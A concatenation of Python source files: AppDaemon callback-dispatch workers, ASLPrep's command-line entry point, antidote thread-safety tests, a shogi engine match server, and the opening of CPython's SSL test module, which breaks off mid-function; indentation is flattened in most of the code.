if "pin_thread" in kwargs:
if kwargs["pin_thread"] < 0 or kwargs["pin_thread"] >= self.thread_count:
self.logger.warning("Invalid value for pin_thread (%s) in app: %s - discarding callback", kwargs["pin_thread"], name)
valid = False
return valid
async def get_pinned_apps(self, thread):
id = int(thread.split("-")[1])
apps = []
for obj in self.AD.app_management.objects:
if self.AD.app_management.objects[obj]["pin_thread"] == id:
apps.append(obj)
return apps
#
# Constraints
#
async def check_constraint(self, key, value, app):
unconstrained = True
if key in app.list_constraints():
method = getattr(app, key)
unconstrained = await utils.run_in_executor(self, method, value)
return unconstrained
async def check_time_constraint(self, args, name):
unconstrained = True
if "constrain_start_time" in args or "constrain_end_time" in args:
if "constrain_start_time" not in args:
start_time = "00:00:00"
else:
start_time = args["constrain_start_time"]
if "constrain_end_time" not in args:
end_time = "23:59:59"
else:
end_time = args["constrain_end_time"]
if await self.AD.sched.now_is_between(start_time, end_time, name) is False:
unconstrained = False
return unconstrained
async def check_days_constraint(self, args, name):
unconstrained = True
if "constrain_days" in args:
days = args["constrain_days"]
now = await self.AD.sched.get_now()
daylist = []
for day in days.split(","):
daylist.append(await utils.run_in_executor(self, utils.day_of_week, day))
if now.weekday() not in daylist:
unconstrained = False
return unconstrained
#
# Workers
#
async def check_and_dispatch_state(self, name, funcref, entity, attribute, new_state,
old_state, cold, cnew, kwargs, uuid_, pin_app, pin_thread):
executed = False
#kwargs["handle"] = uuid_
#
#
#
if attribute == "all":
executed = await self.dispatch_worker(name, {
"id": uuid_,
"name": name,
"objectid": self.AD.app_management.objects[name]["id"],
"type": "state",
"function": funcref,
"attribute": attribute,
"entity": entity,
"new_state": new_state,
"old_state": old_state,
"pin_app": pin_app,
"pin_thread": pin_thread,
"kwargs": kwargs,
})
else:
#
# Let's figure out if we need to run a callback
#
# Start by figuring out what the incoming old value was
#
if old_state is None:
old = None
else:
if attribute in old_state:
old = old_state[attribute]
elif 'attributes' in old_state and attribute in old_state['attributes']:
old = old_state['attributes'][attribute]
else:
old = None
#
# Now the incoming new value
#
if new_state is None:
new = None
else:
if attribute in new_state:
new = new_state[attribute]
elif 'attributes' in new_state and attribute in new_state['attributes']:
new = new_state['attributes'][attribute]
else:
new = None
#
# Don't do anything unless there has been a change
#
if new != old:
if "__duration" in kwargs:
#
# We have a pending timer for this, but we are coming around again.
# Either we will start a new timer if the conditions are met
# Or we won't if they are not.
# Either way, we cancel the old timer
#
await self.AD.sched.cancel_timer(name, kwargs["__duration"])
#
# Check if we care about the change
#
if (cold is None or cold == old) and (cnew is None or cnew == new):
#
# We do!
#
if "duration" in kwargs:
#
# Set a timer
#
exec_time = await self.AD.sched.get_now() + timedelta(seconds=int(kwargs["duration"]))
#
# If it's a oneshot, scheduler will delete the callback once it has executed,
# We need to give it the handle so it knows what to delete
#
if kwargs.get("oneshot", False):
kwargs["__handle"] = uuid_
#
# We're not executing the callback immediately so let's schedule it
# Unless we intercede and cancel it, the callback will happen in "duration" seconds
#
kwargs["__duration"] = await self.AD.sched.insert_schedule(
name, exec_time, funcref, False, None,
__entity=entity,
__attribute=attribute,
__old_state=old,
__new_state=new, **kwargs
)
else:
#
# Not a delay so make the callback immediately
#
executed = await self.dispatch_worker(name, {
"id": uuid_,
"name": name,
"objectid": self.AD.app_management.objects[name]["id"],
"type": "state",
"function": funcref,
"attribute": attribute,
"entity": entity,
"new_state": new,
"old_state": old,
"pin_app": pin_app,
"pin_thread": pin_thread,
"kwargs": kwargs
})
return executed
async def dispatch_worker(self, name, args):
unconstrained = True
#
# Argument Constraints
#
for arg in self.AD.app_management.app_config[name].keys():
constrained = await self.check_constraint(arg, self.AD.app_management.app_config[name][arg], self.AD.app_management.objects[name]["object"])
if not constrained:
unconstrained = False
if not await self.check_time_constraint(self.AD.app_management.app_config[name], name):
unconstrained = False
elif not await self.check_days_constraint(self.AD.app_management.app_config[name], name):
unconstrained = False
#
# Callback level constraints
#
myargs = utils.deepcopy(args)
if "kwargs" in myargs:
for arg in myargs["kwargs"].keys():
constrained = await self.check_constraint(arg, myargs["kwargs"][arg], self.AD.app_management.objects[name]["object"])
if not constrained:
unconstrained = False
if not await self.check_time_constraint(myargs["kwargs"], name):
unconstrained = False
elif not await self.check_days_constraint(myargs["kwargs"], name):
unconstrained = False
if unconstrained:
#
# It's going to happen
#
await self.add_to_state("_threading", "admin", "sensor.callbacks_total_fired", 1)
await self.add_to_attr("_threading", "admin", "{}_callback.{}".format(myargs["type"], myargs["id"]), "fired", 1)
#
# And Q
#
if asyncio.iscoroutinefunction(myargs["function"]):
f = asyncio.ensure_future(self.async_worker(myargs))
self.AD.futures.add_future(name, f)
else:
self.select_q(myargs)
return True
else:
return False
# noinspection PyBroadException
async def async_worker(self, args):
thread_id = threading.current_thread().name
_type = args["type"]
funcref = args["function"]
_id = args["id"]
objectid = args["objectid"]
name = args["name"]
error_logger = logging.getLogger("Error.{}".format(name))
args["kwargs"]["__thread_id"] = thread_id
callback = "{}() in {}".format(funcref.__name__, name)
app = await self.AD.app_management.get_app_instance(name, objectid)
if app is not None:
try:
if _type == "scheduler":
try:
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(self.AD.sched.sanitize_timer_kwargs(app, args["kwargs"]))
except TypeError as e:
self.report_callback_sig(name, "scheduler", funcref, args)
elif _type == "state":
try:
entity = args["entity"]
attr = args["attribute"]
old_state = args["old_state"]
new_state = args["new_state"]
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(entity, attr, old_state, new_state, self.AD.state.sanitize_state_kwargs(app, args["kwargs"]))
except TypeError as e:
self.report_callback_sig(name, "state", funcref, args)
elif _type == "event":
data = args["data"]
if args["event"] == "__AD_LOG_EVENT":
try:
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(data["app_name"], data["ts"], data["level"], data["log_type"], data["message"], args["kwargs"])
except TypeError as e:
self.report_callback_sig(name, "log_event", funcref, args)
else:
try:
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(args["event"], data, args["kwargs"])
except TypeError as e:
self.report_callback_sig(name, "event", funcref, args)
except:
error_logger.warning('-' * 60)
error_logger.warning("Unexpected error in worker for App %s:", name)
error_logger.warning( "Worker Ags: %s", args)
error_logger.warning('-' * 60)
error_logger.warning(traceback.format_exc())
error_logger.warning('-' * 60)
if self.AD.logging.separate_error_log() is True:
self.logger.warning("Logged an error to %s", self.AD.logging.get_filename("error_log"))
            finally:
                await self.update_thread_info("async", "idle", name, _type, _id)
else:
if not self.AD.stopping:
self.logger.warning("Found stale callback for %s - discarding", name)
# noinspection PyBroadException
def worker(self):
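        # Synchronous worker loop: each thread blocks on its own queue and executes scheduler,
        # state and event callbacks for apps whose callbacks are not coroutines.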
thread_id = threading.current_thread().name
q = self.get_q(thread_id)
while True:
args = q.get()
_type = args["type"]
funcref = args["function"]
_id = args["id"]
objectid = args["objectid"]
name = args["name"]
error_logger = logging.getLogger("Error.{}".format(name))
args["kwargs"]["__thread_id"] = thread_id
callback = "{}() in {}".format(funcref.__name__, name)
app = utils.run_coroutine_threadsafe(self, self.AD.app_management.get_app_instance(name, objectid))
if app is not None:
try:
if _type == "scheduler":
try:
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
funcref(self.AD.sched.sanitize_timer_kwargs(app, args["kwargs"]))
except TypeError:
self.report_callback_sig(name, "scheduler", funcref, args)
elif _type == "state":
try:
entity = args["entity"]
attr = args["attribute"]
old_state = args["old_state"]
new_state = args["new_state"]
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
funcref(entity, attr, old_state, new_state,
self.AD.state.sanitize_state_kwargs(app, args["kwargs"]))
except TypeError:
self.report_callback_sig(name, "state", funcref, args)
elif _type == "event":
data = args["data"]
if args["event"] == "__AD_LOG_EVENT":
try:
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
funcref(data["app_name"], data["ts"], data["level"], data["log_type"], data["message"], args["kwargs"])
except TypeError:
self.report_callback_sig(name, "log_event", funcref, args)
else:
try:
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
funcref(args["event"], data, args["kwargs"])
except TypeError:
self.report_callback_sig(name, "event", funcref, args)
except:
error_logger.warning('-' * 60)
error_logger.warning("Unexpected error in worker for App %s:", name)
error_logger.warning( "Worker Ags: %s", args)
error_logger.warning('-' * 60)
error_logger.warning(traceback.format_exc())
error_logger.warning('-' * 60)
if self.AD.logging.separate_error_log() is True:
self.logger.warning("Logged an error to %s", self.AD.logging.get_filename("error_log"))
finally:
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, "idle", name, _type, _id))
else:
if not self.AD.stopping:
self.logger.warning("Found stale callback for %s - discarding", name)
q.task_done()
def report_callback_sig(self, name, type, funcref, args):
callback_args = {
"scheduler": {"count": 1, "signature": "f(self, kwargs)"},
"state": {"count": 5, "signature": "f(self, entity, attribute, old, new, kwargs)"},
"event": {"count": 3, "signature": "f(self, event, data, kwargs)"},
"log_event": {"count": 6, "signature": "f(self, name, ts, level, type, message, kwargs)"},
"initialize": {"count": 0, "signature": "initialize()"},
"terminate": {"count": 0, "signature": "terminate()"}
}
sig = inspect.signature(funcref)
if type in callback_args:
if len(sig.parameters) != callback_args[type]["count"]:
self.logger.warning("Suspect incorrect signature type for callback %s() in %s, should be %s - discarding", funcref.__name__, name, callback_args[type]["signature"])
error_logger = logging.getLogger("Error.{}".format(name))
error_logger.warning('-' * 60)
error_logger.warning("Unexpected error in worker for App %s:", name)
error_logger.warning("Worker Ags: %s", args)
error_logger.warning('-' * 60)
error_logger.warning(traceback.format_exc())
error_logger.warning('-' * 60)
if self.AD.logging.separate_error_log() is True:
self.logger.warning("Logged an error to %s", self.AD.logging.get_filename("error_log"))
else:
self.logger.error("Unknown callback type: %s", type)
|
run.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""ASL preprocessing workflow."""
from .. import config
def main():
"""Entry point."""
from os import EX_SOFTWARE
from pathlib import Path
import sys
import gc
from multiprocessing import Process, Manager
from .parser import parse_args
from ..utils.bids import write_derivative_description
parse_args()
sentry_sdk = None
if not config.execution.notrack:
import sentry_sdk
from ..utils.sentry import sentry_setup
sentry_setup()
# CRITICAL Save the config to a file. This is necessary because the execution graph
# is built as a separate process to keep the memory footprint low. The most
# straightforward way to communicate with the child process is via the filesystem.
config_file = config.execution.work_dir / f"config-{config.execution.run_uuid}.toml"
config.to_filename(config_file)
# CRITICAL Call build_workflow(config_file, retval) in a subprocess.
# Because Python on Linux does not ever free virtual memory (VM), running the
# workflow construction jailed within a process preempts excessive VM buildup.
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
retcode = p.exitcode or retval.get("return_code", 0)
aslprep_wf = retval.get("workflow", None)
# CRITICAL Load the config from the file. This is necessary because the ``build_workflow``
# function executed constrained in a process may change the config (and thus the global
# state of ASLPrep).
config.load(config_file)
if config.execution.reports_only:
sys.exit(int(retcode > 0))
if aslprep_wf and config.execution.write_graph:
aslprep_wf.write_graph(graph2use="colored", format="svg", simple_form=True)
retcode = retcode or (aslprep_wf is None) * EX_SOFTWARE
if retcode != 0:
sys.exit(retcode)
# Generate boilerplate
with Manager() as mgr:
from .workflow import build_boilerplate
p = Process(target=build_boilerplate, args=(str(config_file), aslprep_wf))
p.start()
p.join()
if config.execution.boilerplate_only:
sys.exit(int(retcode > 0))
# Clean up master process before running workflow, which may create forks
gc.collect()
# Sentry tracking
if sentry_sdk is not None:
with sentry_sdk.configure_scope() as scope:
scope.set_tag("run_uuid", config.execution.run_uuid)
scope.set_tag("npart", len(config.execution.participant_label))
sentry_sdk.add_breadcrumb(message="ASLPrep started", level="info")
sentry_sdk.capture_message("ASLPrep started", level="info")
config.loggers.workflow.log(
15,
"\n".join(
["ASLPrep config:"] + ["\t\t%s" % s for s in config.dumps().splitlines()]
),
)
config.loggers.workflow.log(25, "ASLPrep started!")
errno = 1 # Default is error exit unless otherwise set
try:
aslprep_wf.run(**config.nipype.get_plugin())
except Exception as e:
if not config.execution.notrack:
from ..utils.sentry import process_crashfile
crashfolders = [
config.execution.output_dir
/ "aslprep"
/ "sub-{}".format(s)
/ "log"
/ config.execution.run_uuid
for s in config.execution.participant_label
]
for crashfolder in crashfolders:
for crashfile in crashfolder.glob("crash*.*"):
process_crashfile(crashfile)
if "Workflow did not execute cleanly" not in str(e):
sentry_sdk.capture_exception(e)
config.loggers.workflow.critical("ASLPrep failed: %s", e)
raise
else:
config.loggers.workflow.log(25, "ASLPrep finished successfully!")
if not config.execution.notrack:
success_message = "ASLPrep finished without errors"
sentry_sdk.add_breadcrumb(message=success_message, level="info")
sentry_sdk.capture_message(success_message, level="info")
# Bother users with the boilerplate only iff the workflow went okay.
boiler_file = config.execution.output_dir / "aslprep" / "logs" / "CITATION.md"
if boiler_file.exists():
if config.environment.exec_env in (
"singularity",
"docker",
"aslprep-docker",
):
boiler_file = Path("<OUTPUT_PATH>") / boiler_file.relative_to(
config.execution.output_dir
)
config.loggers.workflow.log(
25,
"Works derived from this ASLPrep execution should include the "
f"boilerplate text found in {boiler_file}.",
)
errno = 0
finally:
from ..niworkflows.reports import generate_reports
from pkg_resources import resource_filename as pkgrf
# Generate reports phase
failed_reports = generate_reports(
config.execution.participant_label,
config.execution.output_dir,
config.execution.run_uuid,
config=pkgrf("aslprep", "data/reports-spec.yml"),
packagename="aslprep",
)
write_derivative_description(
config.execution.bids_dir, config.execution.output_dir / "aslprep"
)
if failed_reports and not config.execution.notrack:
sentry_sdk.capture_message(
"Report generation failed for %d subjects" % failed_reports,
level="error",
)
sys.exit(int((errno + failed_reports) > 0))
if __name__ == "__main__":
raise RuntimeError(
"aslprep/cli/run.py should not be run directly;\n"
"Please `pip install` aslprep and use the `aslprep` command"
)
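# --- Hedged illustration (not part of the original run.py) ---
# Minimal sketch of the subprocess pattern used in main() above: run the heavy build
# step in a child process so its memory is released when the child exits, and pass
# results back through a multiprocessing.Manager dict. All names are hypothetical.
def _example_build(retval):
    # Stand-in for build_workflow(): the heavy construction happens in the child.
    retval["return_code"] = 0
    retval["result"] = "built-object-placeholder"
def _example_build_in_subprocess():
    from multiprocessing import Manager, Process
    with Manager() as mgr:
        retval = mgr.dict()
        p = Process(target=_example_build, args=(retval,))
        p.start()
        p.join()
        # Prefer the child's exit code; otherwise use what the child reported.
        return p.exitcode or retval.get("return_code", 0), retval.get("result")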
|
test_thread_safety.py
|
import random
import threading
import time
from typing import Callable
from antidote import factory, world
from antidote.core import Container
class A:
pass
class B:
pass
class ThreadSafetyTest:
n_threads = 10
__state = None
@classmethod
def run(cls, target: Callable[[], object], n_threads=None):
threads = [threading.Thread(target=target) for _ in range(n_threads or cls.n_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
@staticmethod
def random_delay(a=0.01, b=None):
b = b or a
time.sleep(a + b * random.random())
@staticmethod
def unique_id():
return threading.get_ident(), random.random()
@classmethod
def check_locked(cls, failures: list):
tid = ThreadSafetyTest.unique_id()
cls.__state = tid
ThreadSafetyTest.random_delay()
if cls.__state != tid:
failures.append(1)
def delayed_new_class(cls):
def f() -> cls:
ThreadSafetyTest.random_delay()
return cls()
return f
def test_container_instantiation_safety():
with world.test.new():
build_a = factory(delayed_new_class(A), singleton=True)
build_b = factory(delayed_new_class(B), singleton=False)
singleton_got = []
non_singleton_got = []
def worker():
singleton_got.append(world.get(A @ build_a))
non_singleton_got.append(world.get(B @ build_b))
ThreadSafetyTest.run(worker)
assert len(set(singleton_got)) == 1
assert len(set(non_singleton_got)) == ThreadSafetyTest.n_threads
# Be sure not to have used a fixture to create a new test world, as it would
# interfere with this test.
def test_world_safety():
singletons = []
def worker():
with world.test.empty():
tid = ThreadSafetyTest.unique_id()
world.test.singleton("x", tid)
ThreadSafetyTest.random_delay()
singletons.append((tid, tid == world.get("x")))
ThreadSafetyTest.run(worker)
assert ThreadSafetyTest.n_threads == len({tid for (tid, _) in singletons})
assert all(equal for (_, equal) in singletons)
def test_state_init_safety():
from antidote._internal import state
from antidote._internal import world as world_utils
old_new_container = world_utils.new_container
called = 0
def new_container():
nonlocal called
called += 1
ThreadSafetyTest.random_delay()
return old_new_container()
state.reset()
world_utils.new_container = new_container
try:
ThreadSafetyTest.run(state.init)
finally:
world_utils.new_container = old_new_container
assert state.current_container() is not None
assert called == 1
def test_state_override_safety():
from antidote._internal import state
state.init()
container = state.current_container()
def create(c):
assert c is container
return Container()
def worker():
ThreadSafetyTest.random_delay()
state.override(create)
ThreadSafetyTest.run(worker)
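# --- Hedged illustration (not part of the original test module) ---
# Typical use of the ThreadSafetyTest helper above: hammer a shared resource from
# several threads and assert afterwards that no update was lost. The lock-protected
# counter below is a hypothetical example, not an antidote API.
def example_lock_protected_counter():
    lock = threading.Lock()
    counter = {"value": 0}
    def worker():
        for _ in range(1000):
            with lock:  # without the lock, increments could be lost under contention
                counter["value"] += 1
    ThreadSafetyTest.run(worker, n_threads=10)
    assert counter["value"] == 10 * 1000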
|
server.py
|
import time
import threading
from src.engine.engine import UsiEngine
from src.engine.enums import Turn
from src.engine.game_result import GameResult
from src.engine.scanner import Scanner
# Helper class that manages a one-on-one game between two engines.
class AyaneruServer:
def __init__(self):
# --- public members ---
# Create and assign the engines for the 1P and 2P sides here.
# By default Black (sente) is the 1P side and White (gote) is the 2P side.
# When self.flip_turn == True this is reversed.
# Note: the sfen of the given starting position does not necessarily start from Black's turn.
self.engines = [UsiEngine(), UsiEngine()]
# Default: 0.1-second-per-move games.
self.set_time_setting("byoyomi 100")
# Number of moves at which the game is treated as a draw (users may change this).
self.moves_to_draw = 320
# Feature to swap which player takes Black and which takes White.
# It takes effect when an engine is obtained via self.engine(Turn).
# False : 1P = Black (sente) , 2P = White (gote)
# True  : 1P = White (gote)  , 2P = Black (sente)
self.flip_turn = False
# If this is set to True before calling game_start(), the engine I/O is printed to standard output.
self.debug_print = False
# If this is set to True before calling game_start(), any "Error xxx" message received from an engine is printed to standard output.
self.error_print = False
# --- public read-only members ---
# The side currently to move.
self.side_to_move = Turn.BLACK
# sfen of the current position (of the form "startpos moves ..." or "sfen ... moves ...").
self.sfen = "startpos"
# Number of plies from the initial position.
self.game_ply = 1
# Current game state.
# Once the game has ended, game_result.is_gameover() == True.
self.game_result = GameResult.INIT
# --- private members ---
# Remaining time [1P side, 2P side], in ms.
self.rest_time = [0, 0]
# Time-control settings for the game,
# i.e. the parsed form of what was passed to self.set_time_setting().
self.time_setting = {}
# Thread that runs the game.
self.game_thread: threading.Thread = None
# Flag to force the game thread to stop.
self.stop_thread: bool = False
# Returns the player number for the given turn (taking flip_turn into account).
# Return value:
#   0 : 1P side
#   1 : 2P side
def player_number(self, turn: Turn) -> int:
if self.flip_turn:
turn = turn.flip()
return int(turn)
# Returns the player name for the given turn (taking flip_turn into account).
# Returns the string "1p" or "2p".
def player_str(self, turn: Turn) -> str:
return str(self.player_number(turn) + 1) + "p"
# Returns the engine for the side to move given by turn.
# Note that when flip_turn == True, Black uses engines[1] and White uses engines[0].
def engine(self, turn: Turn) -> UsiEngine:
return self.engines[self.player_number(turn)]
# Remaining time for the side given by turn.
# self.rest_time is affected by flip_turn.
def get_rest_time(self, turn: Turn) -> int:
return self.rest_time[self.player_number(turn)]
# Configure the time controls.
# time      = main time for both sides [ms]
# time1p    = main time for the 1P side [ms] (to set the 1P side individually)
# time2p    = main time for the 2P side [ms] (to set the 2P side individually)
# byoyomi   = byoyomi (per-move countdown) [ms]
# byoyomi1p = byoyomi for the 1P side [ms]
# byoyomi2p = byoyomi for the 2P side [ms]
# inc       = increment added per move [ms]
# inc1p     = increment for the 1P side [ms]
# inc2p     = increment for the 2P side [ms]
#
# Examples:
#   "byoyomi 100"                                     : 0.1 seconds per move
#   "time 900000"                                     : 15 minutes
#   "time1p 900000 time2p 900000 byoyomi 5000"        : 15 minutes plus 5-second byoyomi
#   "time1p 10000 time2p 10000 inc 5000"              : 10 seconds plus 5 seconds added per move
#   "time1p 10000 time2p 10000 inc1p 5000 inc2p 1000" : 10 seconds, adding 5 s/move for Black and 1 s/move for White
def set_time_setting(self, setting: str):
scanner = Scanner(setting.split())
tokens = [
"time",
"time1p",
"time2p",
"byoyomi",
"byoyomi1p",
"byoyomi2p",
"inc",
"inc1p",
"inc2p",
]
time_setting = {}
while not scanner.is_eof():
token = scanner.get_token()
param = scanner.get_token()
# Check that no unsupported token was specified.
if not token in tokens:
raise ValueError("invalid token : " + token)
int_param = int(param)
time_setting[token] = int_param
# "byoyomi"は"byoyomi1p","byoyomi2p"に敷衍する。("time" , "inc"も同様)
for s in ["time", "byoyomi", "inc"]:
if s in time_setting:
inc_param = time_setting[s]
time_setting[s + "1p"] = inc_param
time_setting[s + "2p"] = inc_param
# Unset entries would be confusing to handle, so zero-fill them.
for token in tokens:
if not token in time_setting:
time_setting[token] = 0
self.time_setting = time_setting
# Initialize the game state and start the game.
# The engines are assumed to already be connected.
# From this point the engines think on their own.
# When the game ends (or similar), game_result changes away from INIT/PLAYING.
# Reading self.sfen afterwards gives the game record.
# start_sfen    : starting position in sfen form. Defaults to the standard starting position.
#                 e.g. "startpos", "startpos moves 7f7g", "sfen ...", "sfen ... moves ...".
# start_gameply : ply within start_sfen at which to start. 0 means start from the last position.
def game_start(self, start_sfen: str = "startpos", start_gameply: int = 0):
# Is a game already in progress? That would violate the preconditions.
if self.game_result == GameResult.PLAYING:
raise ValueError("must be gameover.")
# Set up the position.
sfen = start_sfen
if "moves" not in sfen:
sfen += " moves"
# Starting ply. Ignored if 0 (meaning: start from the final position).
if start_gameply != 0:
sp = sfen.split()
# "moves"の文字列は上で追加しているので必ず存在すると仮定できる。
index = min(sp.index("moves") + start_gameply - 1, len(sp) - 1)
# Join the tokens sp[0] through sp[index].
sfen = " ".join(sp[0 : index + 1])
self.sfen = sfen
for engine in self.engines:
if not engine.is_connected():
raise ValueError("engine is not connected.")
engine.debug_print = self.debug_print
engine.error_print = self.error_print
# Use the 1P engine to get the side to move of the current position.
self.side_to_move = self.engines[0].get_side_to_move()
self.game_ply = 1
self.game_result = GameResult.PLAYING
for engine in self.engines:
engine.send_command("usinewgame") # いまから対局はじまるよー
# Time allotment at the start of the game.
self.rest_time = [
self.time_setting["time1p"],
self.time_setting["time2p"],
]
# Creating a dedicated thread for the game is probably the easiest approach..
self.game_thread = threading.Thread(target=self.game_worker)
self.game_thread.start()
# Game thread.
def game_worker(self):
while self.game_ply < self.moves_to_draw:
# Get the engine belonging to the side to move.
# Note: when flip_turn == True this fetches the other side's engine.
engine = self.engine(self.side_to_move)
engine.usi_position(self.sfen)
# Time settings for the current side to move ("1p" or "2p").
byoyomi_str = "byoyomi" + self.player_str(self.side_to_move)
inctime_str = "inc" + self.player_str(self.side_to_move)
inctime = self.time_setting[inctime_str]
# If no increment is specified, use byoyomi instead.
if inctime == 0:
byoyomi_or_inctime_str = "byoyomi {0}".format(
self.time_setting[byoyomi_str]
)
else:
byoyomi_or_inctime_str = "binc {0} winc {1}".format(
self.time_setting["inc" + self.player_str(Turn.BLACK)],
self.time_setting["inc" + self.player_str(Turn.WHITE)],
)
start_time = time.time()
engine.usi_go_and_wait_bestmove(
f"btime {self.get_rest_time(Turn.BLACK)} wtime {self.get_rest_time(Turn.WHITE)} {byoyomi_or_inctime_str}"
)
end_time = time.time()
# Round the time used up to whole seconds and subtract it from the remaining time.
# Subtract about 300 ms to allow for inter-process communication delay.
# (With byoyomi the engine uses up its time anyway, so this should not matter..)
# A move made within 0.3 seconds counts as 0 seconds, but current engines rarely do
# that except when they have found a mate, so this is acceptable.
elapsed_time = (end_time - start_time) - 0.3
elapsed_time = int(elapsed_time + 0.999) * 1000  # rounded up to whole seconds, converted to [ms]
if elapsed_time < 0:
elapsed_time = 0
# The current side to move as a number: 1P side = 0, 2P side = 1.
int_turn = self.player_number(self.side_to_move)
self.rest_time[int_turn] -= int(elapsed_time)
if (
self.rest_time[int_turn] + self.time_setting[byoyomi_str] < -2000
):  # Flag a timeout only if the clock, including byoyomi, is more than 2 seconds negative. (0.1-second games exist, and deducting whole rounded-up seconds would otherwise trigger this falsely.)
self.game_result = GameResult.from_win_turn(self.side_to_move.flip())
self.game_over()
# In self-play, running out of time should never happen (it makes the measurement unreliable),
# so print a warning.
print("Error! : player timeup")
return
# If the remaining time went negative, clamp it back to 0.
if self.rest_time[int_turn] < 0:
self.rest_time[int_turn] = 0
bestmove = engine.think_result.bestmove
if bestmove == "resign":
# Win for the opposing side.
self.game_result = GameResult.from_win_turn(self.side_to_move.flip())
self.game_over()
return
if bestmove == "win":
# Declaration win (win for the side to move).
# The position itself is not verified, but as long as the engine is not buggy this is fine.
self.game_result = GameResult.from_win_turn(self.side_to_move)
self.game_over()
return
self.sfen = self.sfen + " " + bestmove
self.game_ply += 1
# Add the increment to the remaining time.
self.rest_time[int_turn] += inctime
self.side_to_move = self.side_to_move.flip()
# Repetition draws (sennichite) ought to be handled, but detecting them here is hard,
# so we rely on hitting the move limit instead.
if self.stop_thread:
# Forced stop, so the content of the game is not guaranteed.
self.game_result = GameResult.STOP_GAME
return
# The game ends in a draw.
self.game_result = GameResult.MAX_MOVES
self.game_over()
# Game-over handling.
# Sends the gameover message to the engines.
def game_over(self):
result = self.game_result
if result.is_draw():
for engine in self.engines:
engine.send_command("gameover draw")
elif result.is_black_or_white_win():
# The winner is the side obtained by converting result directly to a Turn.
self.engine(Turn(result)).send_command("gameover win")
self.engine(Turn(result).flip()).send_command("gameover lose")
else:
# Nothing else is supported.
raise ValueError("illegal result")
# Perform cleanup such as shutting down the engines.
def terminate(self):
self.stop_thread = True
self.game_thread.join()
for engine in self.engines:
engine.disconnect()
# Shut down the engines.
def __del__(self):
self.terminate()
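# --- Hedged usage sketch (not part of the original module) ---
# One plausible way to drive AyaneruServer, assuming UsiEngine exposes a
# connect(path_to_engine) method (not shown in this file); the connect() call and
# the engine paths are assumptions.
def example_self_play(engine_path_1p: str, engine_path_2p: str) -> str:
    server = AyaneruServer()
    server.set_time_setting("byoyomi 100")  # 0.1 seconds per move
    server.engines[0].connect(engine_path_1p)  # assumed UsiEngine API
    server.engines[1].connect(engine_path_2p)
    server.game_start("startpos")
    while not server.game_result.is_gameover():  # poll until the game ends
        time.sleep(1)
    server.terminate()
    return server.sfen  # the game record ("startpos moves ...")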
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
REMOTE_ROOT_CERT = data_file("selfsigned_pythontestdotnet.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
